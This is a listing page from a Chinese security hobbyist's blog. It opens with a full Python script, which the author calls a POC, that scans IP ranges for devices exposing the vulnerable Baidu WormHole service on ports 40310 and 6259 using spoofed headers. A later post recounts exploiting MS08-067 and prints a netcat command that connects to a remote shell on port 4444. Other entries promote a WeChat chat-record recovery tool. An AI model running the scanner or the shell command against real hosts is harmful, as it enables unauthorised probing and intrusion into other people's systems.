忙忙碌碌,更新不及时诶。
工具程序

百度WormHole漏洞检测POC


WormHole的检测代码,随手python写的。


#exploit write by fenlog,baidu wormhole POC.
#QQ:345382462

import urllib2, urllib
import sys



headers = {
  "Accept": "*/*",
  "Host": "127.0.0.1",
  "remote-addr": "127.0.0.1",
  "Referer": "http://www.baidu.com/"
}

def ip2num(ip):
    ip = [int(x) for x in ip.split('.')]
    return ip[0]<<24 | ip[1]<<16 | ip[2]<<8 | ip[3]

def num2ip(num):
    return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24, (num & 0x00ff0000) >> 16, (num & 0x0000ff00) >> 8, num & 0x000000ff)

def URLRequest(url):
	try:
		request = urllib2.Request(url = url,headers = headers)
		response = urllib2.urlopen(request)
		return response.read()
	except:
		return ""


if len(sys.argv) == 3:
	ipstart = ip2num(sys.argv[1])
	ipend = ip2num(sys.argv[2])
elif (len(sys.argv) == 2):
	ipstart = ip2num(sys.argv[1])
	ipend = ipstart
else:
	print "Baidu WarmHole POC by www.fenlog.com\nUsage1: %s TargetIP \nUsage2: %s StartIP EndIP" % (sys.argv[0], sys.argv[0])
	exit(0)



if (ipstart > ipend):
	print "Target IP Err"
	exit(0)

urllib2.socket.setdefaulttimeout(3)
	
for targetip in range(ipstart, ipend + 1):
	strip = num2ip(targetip)
	print "Scan %s..." % (strip)
	url1 = "http://%s:%d/getserviceinfo?mcmdf=inapp_baidu_bdgjs&callback=jsonp" % (strip, 40310)
	url2 = "http://%s:%d/getserviceinfo?mcmdf=inapp_baidu_bdgjs&callback=jsonp" % (strip, 6259)
	ret = URLRequest(url1)
	if (len(ret) == 0):
		ret = URLRequest(url2)

	if (len(ret) > 0):
		print "Found %s:%s" % (strip, ret)

print "Scan %d IPs Finish!" % (ipend - ipstart + 1)


More...

blackfeather 2015/11/3 3评论

工具程序

安卓微信聊天记录导出方法

 

微信聊天记录备份恢复助手正式发布!

微信聊天记录恢复助手 软件下载地址: http://www.fenloger.com/   同时支持安卓和苹果设备哦!~

 

 ///////////////////////////////////////// /////////////////////////////////////////

 

这里就说明一下最常用的简单可行的通用方法,对于一些特殊机型或者特殊方法就不提了。

大概的讲两个方法吧,一个是所有安卓手机通用的方法,另一个是安卓4.0及以上版本的方法。

1.安卓4.0及以上版本手机导出方法

查看安卓系统版本请依次点击&ldquo;程序--设定--关于设备(菜单最下面)&rdquo;,里面有Android版本选项。如果不是4.x.x,请跳过这个方法直接看下面的通用方法。

 

...

More...

blackfeather 2013/9/2 5评论

工具程序

在线微信恢复查看使用说明

 

微信聊天记录备份恢复助手正式发布!

微信聊天记录恢复助手 软件下载地址: http://www.fenloger.com/  同时支持安卓和苹果设备哦!~

 

 ///////////////////////////////////////// /////////////////////////////////////////

 

1、注册

这个操作不多说了,用户名只能使用纯数字,其他的没有任何限制比如长度、密码格式什么的,建议大家用户名长一些,密码负责点,忘了密码请联系博主。十分抱歉没有做完善,原谅博主这个精力有限的男人

 

2.导出记录

...

More...

blackfeather 2013/8/30 1评论

工具程序

安卓手机微信聊天记录恢复查看网站公测啦!

 

微信聊天记录备份恢复助手正式发布!

微信聊天记录恢复助手 软件下载地址: http://www.fenloger.com/   同时支持安卓和苹果设备哦!~

 

刚刚开通了群,欢迎各位加入参与互动讨论与问题反馈!!群号:330726869

 ///////////////////////////////////////// /////////////////////////////////////////

 

 

 ///////////////////////////////////////// /////////////////////////////////////////

以下为原WEB版本说明,逐步停止更新,请使用上述软件版本。

经过将近半个月的准备,花费了博主所有的空余时间和部分休息时间,现在终于可以出来见见人了。

安卓微信聊天记录解密查看恢复,平台链接:http://wx.fenlog.com      

...

More...

blackfeather 2013/8/30 2评论

工具程序

MPEG-2视频0day漏洞补丁

 

这几天MPEG-2视频0day漏洞闹得沸沸扬扬,最郁闷的是昨天晚上上网的时候我还中了这个,结果感染了猫癣病毒···不过好在我见多识广,第一反应不对劲立刻冷重启了,然后一一清除···所以我深深的体会到了0day的恐怖和没有打补丁的那种无助。于是乎从某挂了马的网站上分析出了网马,看了看代码,写了一个免疫器。在微软出补丁前,还是这么救济吧···

...

More...

blackfeather 2009/7/7 0评论

工具程序

传说中的MS08067的利用工具--成功过

 

这几天沸沸扬扬的MS08067漏洞,终于在不经意间发现了利用工具,晚上测试一不小心就成功了!有生以来第一次溢出成功,太他妈的激动了,大吼到嗓子哑了!!!!!

C:\Documents and Settings\Administrator>nc -vv 10.1.12.48 4444
PC-200810152207 [10.1.12.48] 4444 (?) open
...

More...

blackfeather 2008/10/27 0评论